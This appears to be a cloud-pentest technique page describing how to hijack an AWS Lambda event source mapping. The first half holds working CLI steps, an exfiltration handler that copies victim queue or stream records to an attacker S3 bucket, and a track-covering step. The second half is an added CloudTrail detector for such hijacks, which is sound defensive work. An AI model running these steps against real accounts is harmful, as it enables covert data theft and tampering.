AWS - Hijack Event Source Mapping to Redirect Stream/SQS/Kinesis to Attacker Lambda

Abuse UpdateEventSourceMapping to switch the target Lambda function of an existing Event Source Mapping (ESM), so that records from DynamoDB Streams, Kinesis, or SQS are delivered to an attacker-controlled function. This quietly redirects live data without touching the producer applications or the original function's code.

Impact

  • Redirect and read live records from existing streams/queues without modifying the producing applications or the victim's code.
  • Possible data exfiltration or logic tampering by processing the victim's traffic in a rogue function.

Required permissions

  • lambda:ListEventSourceMappings
  • lambda:GetEventSourceMapping
  • lambda:UpdateEventSourceMapping
  • The ability to deploy or reuse an attacker-controlled Lambda (lambda:CreateFunction plus iam:PassRole on an execution role that trusts lambda.amazonaws.com, or permission to use an existing function).

Steps

  1. List the Event Source Mappings of the victim function
TARGET_FN=<victim-function-name>
aws lambda list-event-source-mappings --function-name $TARGET_FN \
--query 'EventSourceMappings[].{UUID:UUID,State:State,EventSourceArn:EventSourceArn}'
export MAP_UUID=$(aws lambda list-event-source-mappings --function-name $TARGET_FN \
--query 'EventSourceMappings[0].UUID' --output text)
export EVENT_SOURCE_ARN=$(aws lambda list-event-source-mappings --function-name $TARGET_FN \
--query 'EventSourceMappings[0].EventSourceArn' --output text)
  2. Prepare the attacker-controlled receiver Lambda (same region; ideally a matching VPC/runtime)
cat > exfil.py <<'PY'
import json, boto3, os, time

def lambda_handler(event, context):
    # Log the received batch (truncated) to CloudWatch Logs
    print(json.dumps(event)[:3000])
    # Optionally copy the full batch to an S3 bucket named in EXFIL_S3
    b = os.environ.get('EXFIL_S3')
    if b:
        k = f"evt-{int(time.time())}.json"
        boto3.client('s3').put_object(Bucket=b, Key=k, Body=json.dumps(event))
    # Returning success tells the ESM the batch was processed (SQS messages get deleted)
    return {'ok': True}
PY
zip exfil.zip exfil.py
ATTACKER_LAMBDA_ROLE_ARN=<role-with-logs-(and optional S3)-permissions>
export ATTACKER_FN_ARN=$(aws lambda create-function \
--function-name ht-esm-exfil \
--runtime python3.11 --role $ATTACKER_LAMBDA_ROLE_ARN \
--handler exfil.lambda_handler --zip-file fileb://exfil.zip \
--query FunctionArn --output text)
  3. Repoint the mapping at the attacker function
aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $ATTACKER_FN_ARN
  4. Generate an event on the source so the mapping fires (example: SQS)
SOURCE_SQS_URL=<queue-url>
aws sqs send-message --queue-url $SOURCE_SQS_URL --message-body '{"x":1}'
  5. Confirm the attacker function receives the batch
aws logs filter-log-events --log-group-name /aws/lambda/ht-esm-exfil --limit 5
  6. Covering tracks (optional)
# Pause the mapping (no records are delivered to anyone while it is disabled;
# SQS messages and stream records accumulate within their retention period)
aws lambda update-event-source-mapping --uuid $MAP_UUID --enabled false

# Restore the original target later
aws lambda update-event-source-mapping --uuid $MAP_UUID --function-name $TARGET_FN --enabled true

Notes:

  • For SQS ESMs, the execution role of the Lambda that consumes the queue needs sqs:ReceiveMessage, sqs:DeleteMessage, and sqs:GetQueueAttributes (managed policy: AWSLambdaSQSQueueExecutionRole). For Kinesis and DynamoDB Streams sources the attacker function's role needs the equivalent stream read permissions (managed policies AWSLambdaKinesisExecutionRole / AWSLambdaDynamoDBExecutionRole); without them the mapping will not deliver records.
  • The ESM UUID stays the same; only its FunctionArn changes, so producers and source ARNs are untouched.
  • It is not fully silent: the mapping is the consumer, so the victim function stops receiving records while it is retargeted (SQS messages are deleted once the attacker function returns successfully), and UpdateEventSourceMapping is recorded by CloudTrail as a management event.
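Because the hijack leaves the source ARN and UUID unchanged, the only durable signal is the UpdateEventSourceMapping call itself. The following detector is an added example (not from the original page): it compares each UpdateEventSourceMapping record in CloudTrail against a baseline inventory of UUID -> expected FunctionArn and flags retargeting or pausing. The baseline, ARNs, principal names and CloudTrail records are all constructed for this example; the responseElements field names follow the Lambda API response in camelCase, which is an assumption to confirm against a real trail before deploying.

```python
"""Flag Event Source Mapping hijacks (UpdateEventSourceMapping) in CloudTrail.

Added example, not part of the original page. Record shapes and ARNs below are
constructed; field names are assumed to mirror the Lambda API response.
"""
from typing import Dict, List

# Constructed identifiers (assumptions for this example)
UUID = "11111111-aaaa-bbbb-cccc-222222222222"
VICTIM_FN = "arn:aws:lambda:us-east-1:111122223333:function:orders-processor"
EXFIL_FN = "arn:aws:lambda:us-east-1:111122223333:function:ht-esm-exfil"
QUEUE_ARN = "arn:aws:sqs:us-east-1:111122223333:orders"

# Assumed baseline: ESM UUID -> FunctionArn it is expected to invoke,
# captured earlier with `aws lambda list-event-source-mappings`.
BASELINE: Dict[str, str] = {UUID: VICTIM_FN}


def _record(actor: str, req: dict, resp: dict,
            name: str = "UpdateEventSourceMapping") -> dict:
    """Build a minimal constructed CloudTrail record (not real data)."""
    return {
        "eventSource": "lambda.amazonaws.com",
        "eventName": name,
        "recipientAccountId": "111122223333",
        "userIdentity": {"arn": actor},
        "requestParameters": req,
        "responseElements": resp,
    }


# Constructed sample trail: a benign batch-size change, a hijack that retargets
# the mapping, a pause, and an unrelated read-only call.
SAMPLE_RECORDS = [
    _record("arn:aws:iam::111122223333:user/deploy",
            {"uuid": UUID, "batchSize": 50},
            {"uuid": UUID, "functionArn": VICTIM_FN,
             "eventSourceArn": QUEUE_ARN, "state": "Updating"}),
    _record("arn:aws:iam::111122223333:user/compromised",
            {"uuid": UUID, "functionName": EXFIL_FN},
            {"uuid": UUID, "functionArn": EXFIL_FN,
             "eventSourceArn": QUEUE_ARN, "state": "Updating"}),
    _record("arn:aws:iam::111122223333:user/compromised",
            {"uuid": UUID, "enabled": False},
            {"uuid": UUID, "functionArn": EXFIL_FN,
             "eventSourceArn": QUEUE_ARN, "state": "Disabling"}),
    _record("arn:aws:iam::111122223333:user/deploy",
            {"uuid": UUID},
            {"uuid": UUID, "functionArn": VICTIM_FN},
            name="GetEventSourceMapping"),
]


def analyse(records: List[dict], baseline: Dict[str, str]) -> List[dict]:
    """Return one finding per suspicious UpdateEventSourceMapping call."""
    findings: List[dict] = []
    for rec in records:
        if (rec.get("eventSource") != "lambda.amazonaws.com"
                or rec.get("eventName") != "UpdateEventSourceMapping"):
            continue
        req = rec.get("requestParameters") or {}
        resp = rec.get("responseElements") or {}
        uuid = req.get("uuid") or resp.get("uuid")
        actor = (rec.get("userIdentity") or {}).get("arn", "unknown")
        new_fn = resp.get("functionArn")
        expected = baseline.get(uuid)

        # Retargeting: the request named a function and the resulting
        # FunctionArn differs from the inventory. UUID and EventSourceArn
        # are unchanged, which is why a source-only inventory misses this.
        if "functionName" in req:
            if expected is None:
                findings.append({"uuid": uuid, "severity": "medium",
                                 "reason": "unknown-mapping-retargeted",
                                 "to": new_fn, "actor": actor})
            elif new_fn and new_fn != expected:
                findings.append({"uuid": uuid, "severity": "high",
                                 "reason": "function-retargeted",
                                 "source": resp.get("eventSourceArn"),
                                 "expected": expected, "to": new_fn,
                                 "actor": actor})

        # Pausing: delivery stops for everyone; often paired with a retarget.
        if req.get("enabled") is False:
            findings.append({"uuid": uuid, "severity": "medium",
                             "reason": "mapping-disabled", "actor": actor})
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_RECORDS, BASELINE):
        print(finding)
```

Feed it records from a CloudTrail Lake query or an S3 trail export filtered on eventName = UpdateEventSourceMapping; a retarget finding whose `to` function lies outside your deployment tooling's naming scheme, or whose actor is not the CI role that normally changes mappings, is the one to page on.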
